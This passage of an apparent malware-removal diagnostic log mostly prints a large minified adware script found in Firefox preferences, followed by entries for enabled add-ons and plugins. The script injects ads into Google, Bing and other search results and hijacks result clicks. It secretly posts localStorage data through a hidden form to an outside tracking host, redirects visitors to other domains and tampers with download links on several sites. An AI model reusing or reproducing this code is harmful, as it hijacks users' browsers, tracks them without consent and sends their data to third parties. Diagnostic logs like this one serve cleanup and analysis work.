f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test( B))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src= b.pixelHost+\"?hid=17411091879117559275&eid=315&pid=2405&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\", \"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\$([0-9]+)\$/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function( B){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a, B){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael= B);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=17411091879117559275&eid=315&pid=2405&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e= document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project, 3E3),!1,b.inputElement,!1)}});;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"i70AALnT=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"i70AALnT=\")){var d=a.match(/i70AALnT=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HrjkMCyVUojs9rdkMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjC9rjwEpjw5qHUFrjC8qjUGqHk=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild( B)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild( B))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch( B){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0];b.parentNode.style.position=\"relative\";var d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=\"0\";d.style.left=\"0\";d.style.width=\"100%\";d.style.height=\"100%\";d.style.zIndex=\"9999\";d.style.cursor=\"pointer\";b.parentNode.appendChild(d)};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=qjaKrjs4vTw4rG5GqV1FqdaFrHwFpdr4&eid=315&hid=17411091879117559275&pid=2405&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1.98\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");

FF - prefs.js..extensions.enabledAddons: leethax%40leethax.net:2013.11.18b

FF - prefs.js..extensions.enabledAddons: %7Bc1970c0d-dbe6-4d91-804f-c9c0de643a57%7D:1.3.2.13

FF - prefs.js..extensions.enabledAddons: itst-firefox-plugin%40itstructures.com:1.4.4.0

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1

FF - prefs.js..keyword.URL: "http://websearch.fas...nqvl=55&l=1&q="

FF - user.js - File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()

FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()

FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.)

